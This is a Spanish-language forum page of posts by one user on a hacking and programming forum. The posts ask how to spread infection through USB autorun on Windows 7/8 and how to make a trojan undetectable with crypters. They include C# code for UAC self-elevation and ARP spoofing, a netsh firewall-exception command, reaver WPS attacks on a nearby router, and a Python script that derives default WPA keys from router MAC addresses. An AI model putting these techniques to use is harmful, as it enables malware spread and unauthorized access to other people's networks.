Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Kaxperday

#551
A ver scott_, se trata de infectar el USB desde un ordenador infectado, para que cuando alguien meta ese USB en un ordenador NO infectado se ejecute el autorun.

El autorun en windows 7 y 8 está disabled, no funcionan mas que 2 comandos de autorun.inf, label e icon, y la ideapara conseguir hacerlo funcionar en windows 7 u 8, pasa por programar el bypass que hace la particion en el USB, para así engañar a windows y ejecute el autorun, como puse en el link anterior.

Evidentemente la idea no es infectar el ordenador infectado con el autorun pls.

Saludos.
#552
Entonces una encriptacion tiger32 con themida como sería RUNPE (y podría ser FUD) ¿o lo desencriptaria en el disco al ejecutar el troyano a la primera y lo detectaria el antivirus?

Saludos.
#553
Perfecto, cuenta recuperada!! gracias. ;-) ;-)

A seguir aguantandome jejeje :D :D :D :silbar:
#554
Cita de: kub0x en 23 Mayo 2015, 00:38 AM
Java como comentas es otra alternativa, pero este Framework permite exportar también a iOS y WinPhone, eso sí, el rendimiento.. Una VM dentro de otra VM :P A no ser que por arte de magia lo pase a bytecode de Java.

Si quiere hacer una app para android, el lenguaje para programar android es java, no entiendo es de una VM dentro de otra VB, no ocurre si programa desde el principio en java, y el rendimiento debería ser como el de otra app mas.

Claro que si quiere aprovechar lo que sabe de VB, podría hacer librerías y exportarlas, pero todo depende de lo que quiera hacer, quizás le salga rentable o quizás no.

Saludos.
#555
Buenas socios, he flipado doble en este post.

Una vez porque elektro ha hecho una pregunta, y otra porque se puede programar en android con C# o algo así he entendido, de todas formas tampoco dista tanto Java de C#, al menos desde el punto de vista del programador mediocre xDD.

Y respecto al tema de elektro, creo que podrías hacer la app en C# solo con lo que sabes de VB, yo hace poco traduje código en C con punteros y estructuras y mas ***** a C#, si eso es posible no jodas no será para tanto pasar de VB a C# XDD, aunque también una cosa es un programa y otra un código.

Suerte socio.
#556
Antes de escribir esto ya me baje lo de runas, el código era el siguiente:

Código (csharp) [Seleccionar]
public void elevacionUAC()
       {
           // Launch itself as administrator
           ProcessStartInfo proc = new ProcessStartInfo();
           proc.UseShellExecute = true;
           proc.WorkingDirectory = Environment.CurrentDirectory;
           proc.FileName = Application.ExecutablePath; //System.Reflection.Assembly.GetExecutingAssembly().GetName().CodeBase;
           proc.Verb = "runas";

           try
           {
               Process.Start(proc);
           }
           catch
           {
               // The user refused to allow privileges elevation.
               // Do nothing and return directly ...
               return;
           }

           Application.Exit();  // Quit itself
       }


Esto es una función que al ejecutarla pide permisos de administrador para el programa, en un diálogo.

Aunque si solo hay esta manera y la anterior, (la de editar el manifiesto) me quedo con la del manifiesto y para casos especiales con esta, es decir con ambas.

Parece que he encontrado como añadirla de excepcion al firewall:

netsh firewall add allowedprogram C:\MyApp\MyApp.exe MyApp ENABLE

Lo necesito para que al ejecutarse se conecte a internet, no se si debería cambiar algo en el antivirus por si me bloquea o algo así, saludos.

Hola kubox, como puedo ponerle para editar el manifiesto en ejecucion.

No se como acceder a sus atributos desde el codigo, saludos.

Por cierto en el codigo anterior no compilaba no encuentra Application, no estoy en windows forms, como lo puedo solucionar? xd




Buenas a todos gente, al final tras mucho rastrear por ahí he conseguido ponerlo, que me pida permisos de usuario en plena ejecucion del programa por si lo necesita en algun momento, para ello lo unico que he encontrado es con un form, que te salga una ventanita y le das click a un boton, y entonces te sale lo de los permisos del UAC, pero sin el form no he encontrado nada, os dejo el code.

Código (csharp) [Seleccionar]
public partial class UAC : Form
   {
       public UAC()
       {
           InitializeComponent();
       }


       private void UAC_Load(object sender, EventArgs e)
       {
           // Update the Self-elevate button to show a UAC shield icon.
           this.btnElevate.FlatStyle = FlatStyle.System;
           SendMessage(btnElevate.Handle, BCM_SETSHIELD, 0, (IntPtr)1);
       }

       [DllImport("user32", CharSet = CharSet.Auto, SetLastError = true)]
       static extern int SendMessage(IntPtr hWnd, UInt32 Msg, int wParam, IntPtr lParam);

       const UInt32 BCM_SETSHIELD = 0x160C;


       private void btnElevate_Click(object sender, EventArgs e)
       {
           // Launch itself as administrator
           ProcessStartInfo proc = new ProcessStartInfo();
           proc.UseShellExecute = true;
           proc.WorkingDirectory = Environment.CurrentDirectory;
           proc.FileName = Application.ExecutablePath;
           proc.Verb = "runas";

           try
           {
               Process.Start(proc);
               MessageBox.Show("Tenemos permisos");
           }
           catch
           {
               MessageBox.Show("SIN PERMISOS");
               // The user refused to allow privileges elevation.
               // Do nothing and return directly ...
               return;
           }

           Application.Exit();  // Quit itself
       }
   }



Alguien me puede decir como editar el archivo de manifiesto XML en ejecución??

Y se os ocurre otra manera para hacerlo mas en "background" y sin form?

Ademas no veo solucion al codigo pues lo unico que hace es re-ejecutar el programa como administrador desde 0 (lo estoy probando y al aceptar me vuelve a ejecutar el programa  :¬¬ :¬¬ :¬¬

Quizás con esto se pueda editar el manifiesto en ejecución para cambiarlo a asInvoker.
#557
Pues eso, quiero instalar un programa que necesita elevacion UAC y no se como ponerlo.

Pues le pongo requireAdministrator, y lo anclo al registro, pero luego no funciona y sigue con los permisos de administrador, ¿que hago entonces?.

Ayuda please.
#558
Hola a todos, quiero mandar un ARPPacket a través de un tipo de paquete para wifi (que es la clase que estoy buscando, para eth0 es EthernetPacket), quiero encontrar su homologo para wifi, ya se usar SendARP y no es lo que busco, saludos.

Si mi red fuera de tipo ethernet sería así:

Código (csharp) [Seleccionar]
ARPPacket arp = new ARPPacket(ARPOperation.Response, dstMac, dstIP, srcMac, srcIP);
           EthernetPacket eth = new EthernetPacket(srcMac, dstMac, EthernetPacketType.Arp);
           arp.PayloadData = new byte[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
           eth.PayloadPacket = arp;
           device.SendPacket(eth);


Pero si trabajo con WiFi no funciona, ¿como sería entonces?.

DETALLES: A ver aqui he conseguido listar las clases de PacketDotNet la libreria que estoy usando.

¿Alguien sabe porque EthernetPacket tiene srcmac, dstmac y  tipopaquete?

¿Y la del Wifi supuestamente "Ieee8021QPacket" en teoria la del wifi tiene solo un argumento que no es ninguno de los 3? ¿no debería de tener los mismos?

Tengo un cacao, pero poco a poco me ire aclarando.

Edito: Me pregunto si esto funcionaria:

Código (csharp) [Seleccionar]
ARPPacket arp = new ARPPacket(ARPOperation.Response, dstMac, dstIP, srcMac, srcIP);
           arp.PayloadData = new byte[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
           device.SendPacket(arp);



Edito: He probado ambos enviando a mi movil paquetes ARP y ninguno funciona, lo que busco es hacer arp spoofing y seguramente falte algo mas. Puede que SendARP tenga la magia.

leyendo, a ver si consigo implementarlo en C#.

Saludos Benignos.
#559
La funcion muestra las IPs conectadas de un servicio o una interfaz (como por ejemplo la que estas conectado que puede ser WIFI) y su MAC correspondiente.

Mostraría las IPs de los usuarios conectados a la red y su correspondiente MAC, pero al obtener la MAC da error.

Código (csharp) [Seleccionar]
foreach (LibPcapLiveDevice dev in LibPcapLiveDeviceList.Instance)
            {
                for (int i = 0; i < dev.Addresses.Count; i++)
                {
                    var ip = dev.Addresses[i].Addr.ipAddress;

                    if (ip == null)
                        continue;

                    Console.WriteLine(ip.ToString());
                    Console.WriteLine(dev.Addresses[i].Addr.hardwareAddress.ToString());
                }


El problema lo obtengo en la ultima linea, pues dev.Addresses.Addr.hardwareAddress que es de tipo PhysicalAddress es nulo, mientras que la IP la obtiene sin problemas.

Saludos.
#560
Hey gracias por el tema.

Lo primero yo tengo cerca un router: vodafone9E39, y era vulnerable a WPS por lo que comence a usar el reaver para obtener el pin, pero pasadas unas horas dejó de funcionar porque rechazaba los nuevos pins tras X intentos fallidos, así que me quedé sin router.

Pero al leer este tema, me ha vuelto la alegría XD.

El link no funciona, ¿alguien puede pasar el programa con el código fuente?, así podré comprobar si funciona.

Edito: No me funcionó con ningún vodafoneXXXX, no sabñia que era un post viejo, os dejo el código por si alguien quiere probarlo:

Código (python) [Seleccionar]
mac="XX:XX:XX:XX:XX:XX"

try:
bytes = [int(x, 16) for x in mac.split(':')]
c1 = (bytes[-2] << 8) + bytes[-1]
(s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
(m9, m10, m11, m12)   = [int(x, 16) for x in mac.replace(':', '')[8:]]
except:
sys.stderr.write("[!] Check your bssid!  Format XX:XX:XX:XX:XX:XX\n")
sys.exit()

k1 = ( s7 + s8  + m11 + m12) & (0x0F)
k2 = ( m9 + m10 + s9  + s10) & (0x0F)       
x1 = k1  ^ s10
x2 = k1  ^ s9
x3 = k1  ^ s8
y1 = k2  ^ m10
y2 = k2  ^ m11
y3 = k2  ^ m12
z1 = m11 ^ s10
z2 = m12 ^ s9
z3 = k1  ^ k2

wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3)

# Spanish modification in this algorithm
if wpa.find("0") != -1:
wpa = wpa.replace("0","1")

print wpa


Saludos.